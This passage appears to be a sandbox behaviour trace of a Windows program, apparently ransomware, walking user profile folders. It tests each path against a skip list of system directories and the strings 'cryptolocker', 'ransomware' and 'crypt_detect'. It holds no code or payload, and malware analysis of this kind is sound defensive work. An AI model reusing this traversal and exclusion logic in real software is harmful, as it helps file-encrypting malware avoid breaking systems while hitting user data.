ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.105] StrCmpW (psz1="..", psz2=".") returned 1 [0129.105] StrCmpW (psz1="..", psz2="..") returned 0 [0129.105] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0129.106] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.106] GetProcessHeap () returned 0xe30000 [0129.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.106] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0129.106] StrCmpW (psz1="SendTo", psz2=".") returned 1 [0129.106] StrCmpW (psz1="SendTo", psz2="..") returned 1 [0129.106] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0129.106] StrCmpW (psz1="Start Menu", psz2=".") returned 1 [0129.106] StrCmpW (psz1="Start Menu", psz2="..") returned 1 [0129.106] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0129.106] StrCmpW (psz1="Templates", psz2=".") returned 1 [0129.106] StrCmpW (psz1="Templates", psz2="..") returned 1 [0129.106] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0129.106] StrCmpW (psz1="Videos", psz2=".") returned 1 [0129.106] StrCmpW (psz1="Videos", psz2="..") returned 1 [0129.106] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0129.106] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0129.106] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Videos", cchMax=1058 | out: psz1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0129.106] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\system32\\") returned 0x0 [0129.106] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.106] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\system\\") returned 0x0 [0129.106] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.106] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.106] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\appdata\\local\\") returned 0x0 [0129.106] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.106] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.106] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.106] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\boot\\") returned 0x0 [0129.106] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\perflogs\\") returned 0x0 [0129.106] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\programdata\\") returned 0x0 [0129.106] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\drivers\\") returned 0x0 [0129.106] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\wsus\\") returned 0x0 [0129.107] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.107] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.107] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="crypt_detect") returned 0x0 [0129.107] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="cryptolocker") returned 0x0 [0129.107] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="ransomware") returned 0x0 [0129.107] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="C:\\WINDOWS") returned 0x0 [0129.107] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.107] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="C:\\Program Files") returned 0x0 [0129.107] GetProcessHeap () returned 0xe30000 [0129.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b0) returned 0xed39f8 [0129.107] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\Videos", cchMax=1072 | out: psz1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0129.107] StrNCatW (in: psz1="C:\\Users\\Default\\Videos", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\Default\\Videos\\*") returned="C:\\Users\\Default\\Videos\\*" [0129.107] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.107] StrCmpW (psz1=".", psz2=".") returned 0 [0129.107] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.107] StrCmpW (psz1="..", psz2=".") returned 1 [0129.107] StrCmpW (psz1="..", psz2="..") returned 0 [0129.107] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0129.107] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.107] GetProcessHeap () returned 0xe30000 [0129.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.107] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0129.107] FindClose (in: hFindFile=0xec2370 | out: hFindFile=0xec2370) returned 1 [0129.107] GetProcessHeap () returned 0xe30000 [0129.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0129.107] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd7b844b1, ftCreationTime.dwHighDateTime=0x1d2a02f, ftLastAccessTime.dwLowDateTime=0xd7b844b1, ftLastAccessTime.dwHighDateTime=0x1d2a02f, ftLastWriteTime.dwLowDateTime=0xd7b844b1, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0129.107] StrCmpW (psz1="Default User", psz2=".") returned 1 [0129.107] StrCmpW (psz1="Default User", psz2="..") returned 1 [0129.107] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc40864ff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default.migrated", cAlternateFileName="DEFAUL~1.MIG")) returned 1 [0129.108] StrCmpW (psz1="Default.migrated", psz2=".") returned 1 [0129.108] StrCmpW (psz1="Default.migrated", psz2="..") returned 1 [0129.108] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0129.108] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0129.108] StrNCatW (in: psz1="C:\\Users\\", psz2="Default.migrated", cchMax=1042 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\system32\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\system\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\appdata\\local\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\boot\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\perflogs\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\programdata\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\drivers\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\wsus\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="crypt_detect") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="cryptolocker") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="ransomware") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="C:\\WINDOWS") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.108] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="C:\\Program Files") returned 0x0 [0129.108] GetProcessHeap () returned 0xe30000 [0129.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0x6874278 [0129.108] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default.migrated", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0129.108] StrNCatW (in: psz1="C:\\Users\\Default.migrated", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\*") returned="C:\\Users\\Default.migrated\\*" [0129.108] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc40864ff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2370 [0129.109] StrCmpW (psz1=".", psz2=".") returned 0 [0129.109] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc40864ff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.109] StrCmpW (psz1="..", psz2=".") returned 1 [0129.109] StrCmpW (psz1="..", psz2="..") returned 0 [0129.109] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7205420a, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0129.109] StrCmpW (psz1="AppData", psz2=".") returned 1 [0129.109] StrCmpW (psz1="AppData", psz2="..") returned 1 [0129.109] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default.migrated", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0129.109] StrNCatW (in: psz1="C:\\Users\\Default.migrated", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\") returned="C:\\Users\\Default.migrated\\" [0129.109] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\", psz2="AppData", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\AppData") returned="C:\\Users\\Default.migrated\\AppData" [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\system32\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\system\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\appdata\\local\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\boot\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\perflogs\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\programdata\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\drivers\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\wsus\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="crypt_detect") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="cryptolocker") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="ransomware") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="C:\\WINDOWS") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.109] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="C:\\Program Files") returned 0x0 [0129.109] GetProcessHeap () returned 0xe30000 [0129.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c4) returned 0xed39f8 [0129.110] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default.migrated\\AppData", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData") returned="C:\\Users\\Default.migrated\\AppData" [0129.110] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData", psz2="\\*", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData\\*") returned="C:\\Users\\Default.migrated\\AppData\\*" [0129.110] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\AppData\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7205420a, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.110] StrCmpW (psz1=".", psz2=".") returned 0 [0129.110] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7205420a, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.110] StrCmpW (psz1="..", psz2=".") returned 1 [0129.110] StrCmpW (psz1="..", psz2="..") returned 0 [0129.110] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0129.110] StrCmpW (psz1="Local", psz2=".") returned 1 [0129.110] StrCmpW (psz1="Local", psz2="..") returned 1 [0129.110] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default.migrated\\AppData", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData") returned="C:\\Users\\Default.migrated\\AppData" [0129.110] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData\\") returned="C:\\Users\\Default.migrated\\AppData\\" [0129.110] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\", psz2="Local", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local") returned="C:\\Users\\Default.migrated\\AppData\\Local" [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\system32\\") returned 0x0 [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\system\\") returned 0x0 [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\appdata\\local\\") returned 0x0 [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\boot\\") returned 0x0 [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\perflogs\\") returned 0x0 [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\programdata\\") returned 0x0 [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\drivers\\") returned 0x0 [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\wsus\\") returned 0x0 [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.110] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.111] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="crypt_detect") returned 0x0 [0129.111] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="cryptolocker") returned 0x0 [0129.111] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="ransomware") returned 0x0 [0129.111] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="C:\\WINDOWS") returned 0x0 [0129.111] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.111] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="C:\\Program Files") returned 0x0 [0129.111] GetProcessHeap () returned 0xe30000 [0129.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d0) returned 0xed90d0 [0129.111] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\Default.migrated\\AppData\\Local", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local") returned="C:\\Users\\Default.migrated\\AppData\\Local" [0129.111] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\Local", psz2="\\*", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\*") returned="C:\\Users\\Default.migrated\\AppData\\Local\\*" [0129.111] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\AppData\\Local\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.111] StrCmpW (psz1=".", psz2=".") returned 0 [0129.111] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, 